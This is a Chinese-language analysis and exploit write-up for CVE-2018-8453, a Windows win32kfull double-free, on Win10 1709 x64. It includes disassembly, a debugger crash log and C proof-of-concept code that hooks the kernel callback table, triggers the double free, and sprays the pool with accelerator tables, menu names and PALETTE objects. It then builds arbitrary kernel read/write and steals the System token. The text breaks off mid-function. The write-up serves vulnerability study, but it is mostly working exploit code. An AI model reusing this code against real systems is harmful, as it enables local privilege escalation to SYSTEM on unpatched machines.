由于win32kfull中的NtUserSetWindowFNID在对窗口对象的fnid进行设置的时候,没有判断该窗口是否已经释放,这样就可以对一个已经释放的窗口进行fnid的设置。而在xxxSBTrackInit和xxxFreeWindow中都存在用户层的回调,通过对函数的劫持可以在回调中释放掉xxxSBTrackInit函数中使用的tagSBTRACK结构体,这样当xxxSBTrackInit释放该结构体的时候就会因为双重释放导致BSOD的产生。通过xxxSBTrackInit函数释放结构体之前会对结构体中的部分成员进行解引用的操作,在相应的内存地址中放置PALETTE的cEntries成员的地址来利用解引用扩大该值,实现越界地址写入相邻PALETTE的pFirstColor来实现任意地址读写,最终实现提权。
操作系统:Win10 x64 1709 专业版
编译器:Visual Studio 2017
调试器:IDA Pro, WinDbg
由于在Win10系统中,很多符号并没有导出,所以一些结构体成员只能通过分析得到。对于窗口对象tagWND,和本次漏洞有关的成员定义如下:
3: kd> dt tagWND +0x000 head : _THRDESKHEAD +0x052 fnid : Uint2B +0x0A8 pcls : Ptr64 tagCLS +0x180 cbwndExtra : Uint8B 3: kd> dt _THRDESKHEAD +0x000 h : Ptr64 Void +0x008 cLockObj : Uint4B +0x010 pti : Ptr64 tagTHREADINFO +0x018 rpdesk : Ptr64 tagDESKTOP +0x020 pSelf : Ptr64 UChar
tagWND偏移0x52的fnid表明了窗口的状态,当值包含0x8000的时候,表示窗口被释放:
#define FNID_DELETED_BIT 0x00008000
tagWND偏移0x10的pti指向tagTHREADINFO结构体,改结构体保存了线程信息,定义如下:
3: kd> dt tagTHREADINFO +0x198 pq : Ptr64 tagQ +0x2B0 pSBTrack : Ptr64 tagSBTRACK
tagTHREADINFO偏移0x198的pq指向tagQ结构体,结构体定义如下:
1: kd> dt tagQ +0x068 spwndCapture : Ptr64 tagWND
tagTHREADINFO偏移0x2B0指向tagSBTRACK结构体,当鼠标在一个滚动条按下左键的时候,系统会通过该结构体用来标记鼠标的当前状态,结构体定义如下:
3: kd> dt tagSBTRACK -v struct tagSBTRACK, 17 elements, 0x68 bytes +0x000 fHitOld : Bitfield Pos 0, 1 Bit +0x000 fTrackVert : Bitfield Pos 1, 1 Bit +0x000 fCtlSB : Bitfield Pos 2, 1 Bit +0x000 fTrackRecalc : Bitfield Pos 3, 1 Bit +0x008 spwndTrack : Ptr64 to struct tagWND, 170 elements, 0x128 bytes +0x010 spwndSB : Ptr64 to struct tagWND, 170 elements, 0x128 bytes +0x018 spwndSBNotify : Ptr64 to struct tagWND, 170 elements, 0x128 bytes +0x020 rcTrack : struct tagRECT, 4 elements, 0x10 bytes +0x030 xxxpfnSB : Ptr64 to void +0x038 cmdSB : Uint4B +0x040 hTimerSB : Uint8B +0x048 dpxThumb : Int4B +0x04c pxOld : Int4B +0x050 posOld : Int4B +0x054 posNew : Int4B +0x058 nBar : Int4B +0x060 pSBCalc : Ptr64 to struct tagSBCALC, 16 elements, 0x40
内核通过xxxFreeWindow来释放窗口,函数会将要释放的窗口对象的fnid与0x8000进行或运算,表示窗口被释放。接着判断窗口对象是否有扩展内存,即cbwndExtra是否为0,如果不为0,则执行xxxClientFreeWindowClassExtraBytes来释放扩展内存:
.text:00000001C0050A10 mov r8, [rdi+180h] ; r8 = tagWND->cbwndExtra .text:00000001C0050A17 mov eax, 8000h .text:00000001C0050A1C or [rdi+52h], ax ; tagWND->fnid |= 0x8000 .text:00000001C0050A20 lea rax, [r8-1] .text:00000001C0050A24 cmp rax, 0FFFFFFFFFFFFFFFDh .text:00000001C0050A28 ja short loc_1C0050A6D ; 判断r8是否为0 .text:00000001C0050A2A test dword ptr [rdi+130h], 800h .text:00000001C0050A34 jnz loc_1C00513AD .text:00000001C0050A3A call cs:__imp_PsGetCurrentProcess .text:00000001C0050A40 mov ecx, [rax+304h] .text:00000001C0050A46 test ecx, 40000008h .text:00000001C0050A4C jnz short loc_1C0050A66 .text:00000001C0050A4E mov eax, [r15+1D0h] .text:00000001C0050A55 test r14b, al .text:00000001C0050A58 jnz short loc_1C0050A66 .text:00000001C0050A5A mov rcx, [rdi+180h] ; rcx = tagWND->cbwndExtra .text:00000001C0050A61 call xxxClientFreeWindowClassExtraBytes
xxxClientFreeWindowClassExtraBytes函数会执行KeUserModeCallback来返回用户层:
.text:00000001C00B6D25 mov r8d, 8 .text:00000001C00B6D2B lea rax, [rsp+48h+arg_10] .text:00000001C00B6D30 lea r9, [rsp+48h+var_18] .text:00000001C00B6D35 mov [rsp+48h+var_28], rax .text:00000001C00B6D3A lea rdx, [rsp+48h+arg_18] .text:00000001C00B6D3F lea ecx, [r8+76h] ; ecx = 0x76 + 0x8 = 0x7E .text:00000001C00B6D43 call cs:__imp_KeUserModeCallback
xxxClientFreeWindowClassExtraBytes函数执行完成之后,函数会判断窗口对象的fnid值的低12位是否在0x2A0到0x2AA之间:
.text:00000001C00509EF movzx eax, word ptr [rdi+52h] ; eax = tagWND->fnid .text:00000001C00509F3 mov edx, 3FFFh .text:00000001C00509F8 movzx ecx, ax .text:00000001C00509FB and cx, dx .text:00000001C00509FE mov edx, 29Ah .text:00000001C0050A03 lea r8d, [rdx+6] ; r8d = 0x29A + 0x6 = 0x2A0 .text:00000001C0050A07 cmp cx, dx .text:00000001C0050A0A jnb loc_1C005117A ; 此处会跳转 ; 省略部分代码 .text:00000001C005117A loc_1C005117A: .text:00000001C005117A mov ebx, 4000h .text:00000001C005117F test bx, ax .text:00000001C0051182 jnz loc_1C0050A10 ; r8 = tagWND->cbwndExtra .text:00000001C0051188 cmp cx, r8w ; r8w = 0x2A0 .text:00000001C005118C jbe loc_1C00514B7 ; fnid <= 0x2A0跳转 .text:00000001C0051192 mov eax, 2AAh .text:00000001C0051197 cmp cx, ax .text:00000001C005119A ja short loc_1C00511AC ; fnid >= 0x2AA则跳转 .text:00000001C005119C mov eax, [r15+1D0h] .text:00000001C00511A3 test r14b, al .text:00000001C00511A6 jz loc_1C00515D8 ; 这里需要跳转
如果fnid在0x2A0到0x2AA之间,则会调用SfnDWORD函数:
.text:00000001C00515D8 loc_1C00515D8: .text:00000001C00515D8 mov rax, cs:__imp_gpsi .text:00000001C00515DF xor r9d, r9d ; r9d = 0 .text:00000001C00515E2 movzx ecx, cx .text:00000001C00515E5 xor r8d, r8d .text:00000001C00515E8 mov [rsp+100h+var_C8], r13 .text:00000001C00515ED mov dword ptr [rsp+100h+var_D0], r14d .text:00000001C00515F2 mov rax, [rax] .text:00000001C00515F5 lea edx, [r9+70h] ; edx = 0 + 0x70 = 0x70 .text:00000001C00515F9 mov rax, [rax+rcx*8-1210h] .text:00000001C0051601 mov rcx, rdi .text:00000001C0051604 mov qword ptr [rsp+100h+var_D8], rax .text:00000001C0051609 mov qword ptr [rsp+100h+var_E0], r13 .text:00000001C005160E call SfnDWORD .text:00000001C0051613 jmp loc_1C00511AC
SfnDWORD函数也会调用KeUserModeCallback函数返回用户层:
.text:00000001C006F85A lea r9, [rsp+108h+arg_18] ; .text:00000001C006F862 mov r8d, 30h ; '0' ; .text:00000001C006F868 lea rdx, [rsp+108h+var_C8] .text:00000001C006F86D lea ecx, [r8-2Eh] ; ecx = 0x30 - 0x2E = 0x2 .text:00000001C006F871 call cs:__imp_KeUserModeCallback
xxxSBTrackInit是用来执行鼠标左键按下滚动条进行拖动的函数,该函数的部分代码如下,函数首先申请一块内存用来保存pSBTrack结构体,对这块内存进行初始化,并对部分成员进行引用;接着函数调用xxxSBTrackLoop用来处理拖动滚动条要处理的消息;最后函数对相关成员进行解引用后,释放掉pSBTrack结构体:
__int64 __fastcall xxxSBTrackInit(struct tagWND *tagWND, __int64 a2, int a3, int a4) { // 申请内存并进行初始化 pSBTrack = Win32AllocPoolWithQuota(0x68, 'tssU'); pSBTrack_1 = pSBTrack; if ( !pSBTrack ) return pSBTrack; // 对成员进行初始化 *(_DWORD *)pSBTrack &= 0xFFFFFFFE; *(_QWORD *)(pSBTrack + 0x40) = 0i64; *(_QWORD *)(pSBTrack + 8) = 0i64; *(_QWORD *)(pSBTrack + 0x10) = 0i64; *(_QWORD *)(pSBTrack + 0x18) = 0i64; *(_QWORD *)(pSBTrack + 0x30) = xxxTrackBox; // 将pSBTrack存储与tagTHRAEDINFO->pSBTrack中 *(_QWORD *)(*((_QWORD *)tagWND + 2) + 0x2B0i64) = pSBTrack; // 对spwndTrack,spwndSB,spwndSBNotify进行引用 arr[0] = pSBTrack_1 + 8; arr[1] = tagWND; HMAssignmentLock(arr); arr[0] = pSBTrack_1 + 0x10; arr[1] = tagWND; HMAssignmentLock(arr); arr[0] = pSBTrack_1 + 0x18; arr[1] = *((_QWORD *)tagWND + 0xD); HMAssignmentLock(arr); xxxCapture(*(_QWORD *)gptiCurrent, tagWND, 3i64); pti = *((_QWORD *)tagWND + 2); if ( pSBTrack == *(_QWORD *)(pti + 0x2B0) ) { // 消息分发 xxxSBTrackLoop(tagWND, a2, (struct tagSBCALC *)v17); // 释放pSBTrack对象 pti = *((_QWORD *)tagWND + 2); pSBTrack = *(_QWORD *)(pti + 0x2B0); if ( pSBTrack ) { // 解引用 HMAssignmentUnlock(pSBTrack + 0x18); HMAssignmentUnlock(pSBTrack + 0x10); HMAssignmentUnlock(pSBTrack + 8); // 释放pSBTrack Win32FreePool(pSBTrack); pti = *((_QWORD *)tagWND + 2); *(_QWORD *)(pti + 0x2B0) = 0i64; return pti; } } }
xxxSBTrackLoop会调用xxxTranslateMessage和xxxDispatchMessage来分发处理消息,xxxDispatchMessage函数会调用上面说的SfnWORD函数来返回用户层:
该函数用来设置窗口对象的fnid增加指定的值,但是,这里增加的时候,函数没有判断窗口是否已经被释放,即是否具备0x8000。这就会导致,进行设置的时候很有可能会对一个已经释放的窗口的fnid值进行设置:
__int64 __fastcall NtUserSetWindowFNID(__int64 a1, __int16 fnid) { hwnd = ValidateHwnd(a1); if ( hwnd ) { if ( *(_QWORD *)(*(_QWORD *)(hwnd + 0x10) + 400i64) == PsGetCurrentProcessWin32Process(v5) ) { // 判断要设置的fnid是否满足要求 if ( fnid == 0x4000 || fnid - 0x2A1 <= 9 && (*(_WORD *)(hwnd + 0x52) & 0x3FFF) == 0 ) { // 设置tagWND->fnid *(_WORD *)(hwnd + 0x52) |= fnid; } } } }
这个漏洞的成因比较复杂,要将上面的几个函数都联系起来看,成因如下:
当向滚动条控件发送WM_LBUTTONDOWN(左键按下)的消息时候,xxxSBTrackInit函数就会被调用,xxxSBTrackInit函数会调用xxxDispatchMessage,该函数又会调用SfdDWORD来返回用户层
如果用户HOOK了用户层对应的处理函数,就可以在该函数中调用DestroyWindow来释放拥有该滚动条控件的窗口。这样就会执行xxxFreeWindow,该函数会首先将窗口的fnid标记为删除的窗口,接着在该窗口存在扩展对象的时候,调用xxxClientFreeWindowClassExtraBytes函数返回用户层
如果用户HOOK了用户层对应的处理函数,就可以在处理函数中调用NtUserSetWindowFNID,将窗口的fnid加入0x2A1的标记。这样xxxClientFreeWindowClassExtraBytes函数返回以后,会因为被修改的窗口的fnid值的低12位为0x2A1导致再次调用SfdDWORD返回用户层,此时在对应的处理函数中释放掉xxxSBTrackInit函数申请的pSBTrack结构体,这块内存就会处于释放状态
当xxxFreeWindow函数返回后,就会返回到xxxSBTrackInit继续执行,而xxxSBTrackInit会在最后释放pSBTrack结构体,而这个结构体已经被释放,此时如果在释放就会产生BSOD错误
要成功触发这个漏洞,就需要在SfdDWORD在用户层的处理函数中释放pSBTrack结构体,此时只需要通过向滚动条发送WM_CANCELMODE消息,该函数会导致xxxEndScroll函数来释放内存,该函数的主要代码如下:
__int64 __fastcall xxxEndScroll(struct tagWND *pwnd, int a2) { // 要释放pSBTrack结构体的三个条件 pti = *((_QWORD *)pwnd + 2); pSBTrack = *(_QWORD *)(pti + 0x2B0); if ( !pSBTrack ) // pSBTrack != NULL return pti; pq = *(_QWORD *)(*(_QWORD *)gptiCurrent + 0x198i64); if ( *(struct tagWND **)(pq + 0x68) != pwnd ) // pq->spwndCapture == pwnd return pti; if ( !*(_QWORD *)(pSBTrack + 0x30) ) // pSBTrack->xxxpfnSB != NULL return pti; // 释放掉pSBTrack结构体 pti = *((_QWORD *)pwnd + 2); if ( pSBTrack == *(_QWORD *)(pti + 0x2B0) ) { spwndSB = *(struct tagWND **)(pSBTrack + 0x10); if ( !spwndSB || (zzzShowCaret(spwndSB), pti = *((_QWORD *)pwnd + 2), pSBTrack == *(_QWORD *)(pti + 0x2B0)) ) { *(_QWORD *)(pSBTrack + 0x30) = 0i64; HMAssignmentUnlock(pSBTrack + 0x10); HMAssignmentUnlock(pSBTrack + 0x18); HMAssignmentUnlock(pSBTrack + 8); Win32FreePool(pSBTrack); pti = *((_QWORD *)pwnd + 2); *(_QWORD *)(pti + 0x2B0) = 0i64; } } return pti; }
其中第二处的限制需要窗口一个新得滚动条对象,并对其调用SetCapture。整个触发漏洞的流程如下:
创建一个带有八字节额外内存的窗口对象,并将该对象的句柄赋值到额外内存中供之后使用。同时,在该窗口中在创建一个滚动条对象用来触发漏洞
HOOK SfdDWORD和xxxCreateFreeWindowClassExtraBytes返回到用户层会执行的函数
向创建的窗口发送WM_LBUTTIONDWORD函数来调用xxxSBTrackInit函数
在用户层定义的xxxClientFreeWindowClassExtraBytes会根据要释放的内存中保存的是否是第一步中窗口的窗口句柄,来判断是否要修改fnid和调用SetCapture
在用户层定义的SfdDWORD的处理函数中,会判断如果是第一次调用就会通过DestroyWindow来调用xxxFreeWindow。如果是第二处调用,则发送WM_CANCELMODE来是否pSBTrackInit函数
当xxxSBTrackInit函数最后释放pSBTrack结构体的时候就会因为双重释放导致BSOD
BOOL CreateWindows() { BOOL bRet = TRUE; HINSTANCE handle = NULL; handle = GetModuleHandle(NULL); if (!handle) { bRet = FALSE; ShowError("GetModuleHandle", GetLastError()); goto exit; } char *szClassName = "MainWindow"; WNDCLASS wc = { 0 }; wc.style = CS_HREDRAW | CS_VREDRAW; wc.lpfnWndProc = DefWindowProc; wc.hInstance = handle; wc.cbWndExtra = 8; wc.lpszClassName = szClassName; if (!RegisterClass(&wc)) { bRet = FALSE; ShowError("RegisterClass", GetLastError()); goto exit; } Window = CreateWindowEx(0, szClassName, NULL, WS_DISABLED, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); if (!Window) { bRet = FALSE; ShowError("CreateWindowEx", GetLastError()); goto exit; } SetWindowLong(Window, 0, (ULONG)Window); ScrollBar = CreateWindowEx(0, "SCROLLBAR", NULL, WS_CHILD | WS_VISIBLE | SBS_HORZ, NULL, NULL, 2, 2, Window, NULL, handle, NULL); if (!ScrollBar) { bRet = FALSE; ShowError("CreateWindowEx", GetLastError()); goto exit; } exit: return bRet; } BOOL HookFunc_CVE_2018_8453() { BOOL bRet = TRUE; ULONG64 ulKernelCallBackTable = *(PULONG64)(GetPEB() + 0x58); DWORD dwOldProtect = 0; if (!VirtualProtect((PVOID)ulKernelCallBackTable, PAGE_SIZE, PAGE_READWRITE, &dwOldProtect)) { bRet = FALSE; ShowError("VirtualProtect", GetLastError()); goto exit; } org_fnDWORD = (pFunc)*(PULONG64)(ulKernelCallBackTable + 0x8 * 0x2); *(PULONG64)(ulKernelCallBackTable + 0x8 * 0x2) = (ULONG64)My_fnDWORD; org_xxxClientAllocWindowClassExtraBytes = (pFunc)*(PULONG64)(ulKernelCallBackTable + 0x8 * 0x80); *(PULONG64)(ulKernelCallBackTable + 0x8 * 0x80) = (ULONG64)My_xxxClientFreeWindowClassExtraBytes; if (!VirtualProtect((PVOID)ulKernelCallBackTable, PAGE_SIZE, dwOldProtect, &dwOldProtect)) { bRet = FALSE; ShowError("VirtualProtect", GetLastError()); goto exit; } exit: return bRet; } LONG64 My_fnDWORD(PVOID arg0) { if (g_Flag_2018_8453 && *(PDWORD)arg0) { g_Flag_2018_8453 = FALSE; DestroyWindow(Window); } if (*((PULONG64)arg0 + 1) == 0x70) { SendMessage(New_ScrollBar, WM_CANCELMODE, 0, 0); } return org_fnDWORD(arg0); } LONG64 My_xxxClientFreeWindowClassExtraBytes(PVOID arg0) { if ((*(HWND*)*(HWND*)arg0) == Window) { New_ScrollBar = CreateWindowExA(0, "SCROLLBAR", NULL, SBS_HORZ | WS_HSCROLL | WS_VSCROLL, NULL, NULL, 2, 2, NULL, NULL, GetModuleHandleA(0), NULL); NtUserSetWindowFNID(Window, 0x2A1); SetCapture(New_ScrollBar); } return org_xxxClientAllocWindowClassExtraBytes(arg0); } BOOL POC_CVE_2018_8453() { BOOL bRet = TRUE; if (!CreateWindows()) { bRet = FALSE; goto exit; } if (!HookFunc_CVE_2018_8453()) { bRet = FALSE; goto exit; } g_Flag_2018_8453 = TRUE; SendMessageA(ScrollBar, WM_LBUTTONDOWN, MK_LBUTTON, 0x00080008); exit: return bRet; }
编译运行POC就会产生BSOD错误,以下是部分错误信息:
2: kd> !analyze -v Connected to Windows 10 16299 x64 target at (Tue Jul 12 23:41:49.772 2022 (UTC + 8:00)), ptr64 TRUE ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* BAD_POOL_CALLER (c2) The current thread is making a bad pool request. Typically this is at a bad IRQL level or double freeing the same allocation, etc. Arguments: Arg1: 0000000000000007, Attempt to free pool which was already freed Arg2: 0000000074737355, Pool tag value from the pool header Arg3: 000000002d080002, Contents of the first 4 bytes of the pool header Arg4: ffffea21825a28f0, Address of the block of pool being deallocated POOL_ADDRESS: ffffea21825a28f0 Paged session pool FREED_POOL_TAG: Usst PROCESS_NAME: exp_x64.exe STACK_TEXT: nt!DbgBreakPointWithStatus nt!KiBugCheckDebugBreak+0x12 nt!KeBugCheck2+0x937 nt!KeBugCheckEx+0x107 nt!ExFreePoolWithTag+0x17bc win32kfull!Win32FreePoolImpl+0x4c win32kbase!Win32FreePool+0x1c win32kfull!xxxSBTrackInit+0x491 win32kfull!xxxSBWndProc+0x9fa win32kfull!xxxSendTransformableMessageTimeout+0x3c8 win32kfull!xxxWrapSendMessage+0x24 win32kfull!NtUserMessageCall+0xfb nt!KiSystemServiceCopyEnd+0x13 win32k!NtUserMessageCall+0x14 USER32!SendMessageWorker+0x108 USER32!SendMessageA+0x55
可以看到BSOD产生的原因就是因为重复释放pSBTrack结构体:
想要不产生BSOD,就需要在第一次释放pSBTrack结构体之后,申请一块共占用0x80大小的内存来占用释放掉的内存,这样在xxxSBTrackInit中第二次释放的时候不会因为释放掉已释放的漏洞产生双重释放。而在xxxSBTrackInit释放内存之前,函数会对其中几个成员通过调用HMAssignmentUnlock来解引用,该函数的实现如下,可以看出就是将传入参数的指针所指向地址偏移为8的地址的值-1,如果可以传入合适的参数来扩大特定的值就可以实现任意地址读写。
之前往往选择BitMap对象,但因为从Win10 1709开始,BitMap对象的data不在对象头之后,pvScan0指向了不同的内存,所以这里就改为选用Palette对象来实现任意地址读写。
创建Palette对象的创建通过CreatePalette函数来实现,该函数的定义如下:
HPALETTE WINAPI CreatePalette(LOGPALETTE * plpal);
其中参数的定义如下,成员palNumEntries指定了数组palPalEntry的个数:
typedef struct tagLOGPALETTE { WORD palVersion; WORD palNumEntries; PALETTEENTRY palPalEntry[1]; } LOGPALETTE, *PLOGPALETTE;
数组palPalEntry的类型为PALETTENTRY,可以看出每个元素占用4字节:
typedef struct tagPALETTEENTRY { BYTE peRed; BYTE peGreen; BYTE peBlue; BYTE peFlags; } PALETTEENTRY;
CreatePalette调用成功之后,就会创建一个PALETTE对象,该对象定义如下,其中偏移0x1C的cEntries等于LOGPALETTE的palNumEntries,偏移0x88的apalColor数组即LOGPALETTE中的palPalEntry数组。
typedef struct _BASEOBJECT64 { ULONG64 hHmgr; ULONG32 ulShareCount; WORD cExclusiveLock; WORD BaseFlags; ULONG64 Tid; } BASEOBJECT64, *POBJ; // sizeof = 0x18 typedef struct _PALETTE64 { BASEOBJECT64 BaseObject; // 0x00 FLONG flPal; // 0x18 ULONG32 cEntries; // 0x1C ULONG64 ulUnknown[0xB] // 0x20 PALETTEENTRY *pFirstColor; // 0x78 PALETTE64 *ppalThis; // 0x80 PALETTEENTRY apalColors[3]; // 0x88 } PALETTE64, *PPALETTE64;
而偏移0x78的pFirstColor指向了apalColors,当通过SetPaletteEntries和GetPaletteEntries进行读写的时候,读写的地址就是由pFirstColor指向的地址:
UINT WINAPI SetPaletteEntries(HPALETTE hpal, UINT iStart, UINT cEntries, PALETTEENTRY *pPalEntries); UINT WINAPI GetPaletteEntries(HPALETTE hpal, UINT iStart, UINT cEntries, LPPALETTEENTRY pPalEntries);
当创建带有MenuName的窗口时,可以通过tagWND偏移0xA8的pcls来获取其在内存中的地址。因此,可以通过创建一个这样的窗口,然后释放掉,在马上创建一个PALETTE,那么它的pcls就指向了这个PALETTE对象(大概率),获取MenuName地址的代码如下,这里需要注意的是创建的内存如果打到一定程度,这块内存的头就不会有0x10的POOL_HEADER,所以使用的时候要根据具体情况来决定。
ULONG64 AllocateFreeWindow(DWORD dwSize) { ULONG64 ulRes = 0; HINSTANCE handle = NULL; handle = GetModuleHandle(NULL); if (!handle) { ShowError("GetModuleHandle", GetLastError()); goto exit; } WNDCLASSW wc = { 0 }; WCHAR szMenuName[0x1005] = { 0 }; PWCHAR pClassName = L"LEAKWS"; memset(szMenuName, 0x42, dwSize - sizeof(WCHAR) - POOL_HEADER_SIZE); wc.style = CS_HREDRAW | CS_VREDRAW; wc.hInstance = handle; wc.lpfnWndProc = DefWindowProc; wc.lpszClassName = pClassName; wc.lpszMenuName = szMenuName; if (!RegisterClassW(&wc)) { ShowError("RegisterClassW", GetLastError()); goto exit; } HWND hWnd = CreateWindowExW(0, pClassName, NULL, WS_DISABLED, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); if (!hWnd) { ShowError("CreateWindowExW", GetLastError()); goto exit; } lHMValidateHandle HMValidateHandle = (lHMValidateHandle)GetHMValidateHandle(); if (!HMValidateHandle) goto exit; PTHRDESKHEAD pTagWndHead = (PTHRDESKHEAD)HMValidateHandle(hWnd, TYPE_WINDOW); ULONG64 ulTagCls = 0, ulClientDelta = 0; ulClientDelta = (ULONG64)pTagWndHead->pSelf - (ULONG64)pTagWndHead; ulTagCls = *(PULONG64)((ULONG64)pTagWndHead + 0xA8) - ulClientDelta; ulRes = *(PULONG64)(ulTagCls + 0x98); DestroyWindow(hWnd); UnregisterClassW(pClassName, handle); exit: return ulRes; }
此时可以通过创建一个0x1000字节的MenuName,在释放掉它并马上申请两个占用0x800的PALETTE,这样这两个PALETTE就会占用释放掉的MenuName,它们在内存中是相邻的,且可以获取到第一个PALETTE对象的地址,此时记录第一个PALETTE对象cEntries对象的地址供之后使用,相应的代码如下:
BOOL GetPalette_CVE_2018_8453(HPALETTE *hPalette) { BOOL bRet = TRUE; CONST DWORD dwCount = 0x1500; DWORD i = 0, dwSize = 0x800; HACCEL hAccel[dwCount] = { NULL }; PLOGPALETTE pLogPalette = NULL; DWORD dwNumEntries = (dwSize - 0x88 - POOL_HEADER_SIZE - 0x10) / 4; DWORD dwPalSize = sizeof(LOGPALETTE) + (dwNumEntries - 1) * sizeof(PALETTEENTRY); pLogPalette = (PLOGPALETTE)malloc(dwPalSize); if (!pLogPalette) { ShowError("malloc", GetLastError()); goto exit; } ZeroMemory(pLogPalette, dwPalSize); memset(pLogPalette, 0x41, dwPalSize); pLogPalette->palNumEntries = dwNumEntries; pLogPalette->palVersion = 0x300; // 消耗0x800大小的空余内存 for (i = 0; i < dwCount; i++) { // 0x14D * 6 + 0x1C + 0x10 = 0x7CE + 0x1C + 0x10 = 0x7FA = 0x800 ACCEL accel[0x14D] = { 0 }; hAccel[i] = CreateAcceleratorTable(accel, 0x14D); if (!hAccel[i]) break; } // 申请一块新的0x1000大小MENUNAME并释放掉它 ULONG64 ulRes = AllocateFreeWindow(0x1000); if (!ulRes) { bRet = FALSE; goto exit; } // 占用释放上一步释放的0x1000大小的内存 hPalette[0] = CreatePalette(pLogPalette); hPalette[1] = CreatePalette(pLogPalette); if (!hPalette[0] || !hPalette[1]) { bRet = FALSE; goto exit; } // 用于记录修改cEntries成员的大小 g_ulTarAddr_2018_8453 = ulRes + 0x2D - 8; exit: for (i = 0; i < dwCount; i++) { if (hAccel[i]) { DestroyAcceleratorTable(hAccel[i]); hAccel[i] = NULL; } else break; } return bRet; }
接下来在第一次释放的时候,就要创建大量的MenuName来占用释放的内存,由于可以直接修改MenuName的值,所以可以对应tagSBTRACK结构体的成员,将其设为上面记录的cEntries成员的地址,这样之后xxxSBTrackInit函数在最后调用HMAssignmentUnlock进行-1操作的时候就会修改cEntries,相应的代码如下:
LONG64 My_fnDWORD(PVOID arg0) { if (g_Flag_2018_8453 && *(PDWORD)arg0) { g_Flag_2018_8453 = FALSE; DestroyWindow(Window); } if (*((PULONG64)arg0 + 1) == 0x70) { CONST DWORD dwCount = 0x2000; DWORD i = 0, dwSize = 0x80; HACCEL hAccel[dwCount] = { NULL }; // 占用0x80的空闲内存 for (i = 0; i < dwCount; i++) { // 0x6 * 0x8 + 0x1C + 0x10 = 0x4E + 0x1C + 0x10 = 0x7A = 0x80 ACCEL accel[0xD] = { 0 }; hAccel[i] = CreateAcceleratorTable(accel, 0xD); if (!hAccel[i]) break; } // 释放tagSBTRACK内存 SendMessage(New_ScrollBar, WM_CANCELMODE, 0, 0); lHMValidateHandle HMValidateHandle = (lHMValidateHandle)GetHMValidateHandle(); if (!HMValidateHandle) goto exit; HINSTANCE handle = GetModuleHandle(NULL); if (!handle) { ShowError("GetModuleHandle", GetLastError()); goto exit; } HWND hWnd[0x400] = { NULL }; WNDCLASSW wc = { 0 }; WCHAR MenuName[0x100] = { 0 }, ClassName[0x50] = { 0 }; // 占用释放的tagSBTRACK内存 memset(MenuName, 0x43, dwSize - sizeof(WCHAR) - POOL_HEADER_SIZE); *(PULONG64)((ULONG64)MenuName + 0x8) = g_ulTarAddr_2018_8453; *(PULONG64)((ULONG64)MenuName + 0x10) = g_ulTarAddr_2018_8453; for (i = 0; i < 0x400; i++) { memset(ClassName, 0, 0x50); sprintf((char*)ClassName, "WindowLeak%d", i); memset(&wc, 0, sizeof(wc)); wc.hInstance = handle; wc.lpfnWndProc = DefWindowProc; wc.lpszMenuName = MenuName; wc.style = CS_HREDRAW | CS_VREDRAW; wc.lpszClassName = ClassName; if (!RegisterClassW(&wc)) { ShowError("RegisterClassW", GetLastError()); break; } hWnd[i] = CreateWindowExW(0, (LPCWSTR)ClassName, NULL, WS_DISABLED, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); if (!hWnd[i]) { ShowError("CreateWindowExW", GetLastError()); break; } } ULONG64 ulTagCls = 0, ulClientDelta = 0; PTHRDESKHEAD pTagWndHead = NULL; for (i = 0; i < 0x400; i++) { if (!hWnd[i]) break; pTagWndHead = (PTHRDESKHEAD)HMValidateHandle(hWnd[i], TYPE_WINDOW); ulClientDelta = (ULONG64)pTagWndHead->pSelf - (ULONG64)pTagWndHead; ulTagCls = *(PULONG64)((ULONG64)pTagWndHead + 0xA8) - ulClientDelta; g_ulMenuName_2018_8453[i] = ulTagCls + 0x98 + ulClientDelta; } for (i = 0; i < dwCount; i++) { if (hAccel[i]) { DestroyAcceleratorTable(hAccel[i]); hAccel[i] = NULL; } else break; } } exit: return org_fnDWORD(arg0); }
在触发漏洞之前可以看到,创建的两个0x800大小的PALETTE对象的第一个PALETTE对象的cEntries为原来的大小:
触发漏洞,进行两次-1操作以后,就被扩大成一个很大的值:
此时就可以通过函数越界读写相邻的那个PALETTE对象的pFirstColor指针来实现任意地址读写了,相应代码如下:
BOOL SetPaletteTarget(HPALETTE hManager, DWORD dwStart, DWORD dwEntries, PVOID pTargetAddress) { BOOL bRet = TRUE; // 设置要读写的内存地址 if (!SetPaletteEntries(hManager, dwStart, dwEntries, (PPALETTEENTRY)&pTargetAddress)) { bRet = FALSE; ShowError("SetPaletteEntries", GetLastError()); goto exit; } exit: return bRet; } ULONG64 ReadDataByPalette(HPALETTE hManager, HPALETTE hWorker, DWORD dwStart, DWORD dwEntries, PVOID pTargetAddress) { ULONG64 ulData = 0; if (!SetPaletteTarget(hManager, dwStart, dwEntries, pTargetAddress)) { goto exit; } if (!GetPaletteEntries(hWorker, 0, dwEntries, (PPALETTEENTRY)&ulData)) { ShowError("GetPaletteEntries", GetLastError()); goto exit; } exit: return ulData; } BOOL WriteDataByPalette(HPALETTE hManager, HPALETTE hWorker, DWORD dwStart, DWORD dwEntries, PVOID pTargetAddress, ULONG64 ulValue) { BOOL bRet = TRUE; if (!SetPaletteTarget(hManager, dwStart, dwEntries, pTargetAddress)) { bRet = FALSE; goto exit; } if (!SetPaletteEntries(hWorker, 0, dwEntries, (PPALETTEENTRY)&ulValue)) { bRet = FALSE; ShowError("SetPaletteEntries", GetLastError()); goto exit; } exit: return bRet; }
可以进行任意地址读写,就可以通过修改Token来实现提权:
BOOL EnablePrivilege_CVE_2018_8453(HPALETTE hManager, HPALETTE hWorker) { BOOL bRet = TRUE; DWORD dwEntries = sizeof(ULONG64) / sizeof(PALETTEENTRY); DWORD dwFirstColorOffset = 0x78; DWORD dwStart = (0x800 - 0x88 + dwFirstColorOffset) / 4; // 获取System进程的EPROCESS ULONG64 ulSystemEprocess = GetSystemEprocessByPalette(hManager, hWorker, dwStart, dwEntries); if (!ulSystemEprocess) { bRet = FALSE; goto exit; } DWORD CONST dwPIDOffset = 0x2E0, dwLinksOffset = 0x2E8, dwTokenOffset = 0x358; ULONG64 ulPID = GetCurrentProcessId(), ulCurPID = 0, ulCurEprocess = ulSystemEprocess; // 获取当前进程EPROCESS do { ulCurEprocess = ReadDataByPalette(hManager, hWorker, dwStart, dwEntries, (PVOID)(ulCurEprocess + dwLinksOffset)); ulCurEprocess -= dwLinksOffset; ulCurPID = ReadDataByPalette(hManager, hWorker, dwStart, dwEntries, (PVOID)(ulCurEprocess + dwPIDOffset)); } while 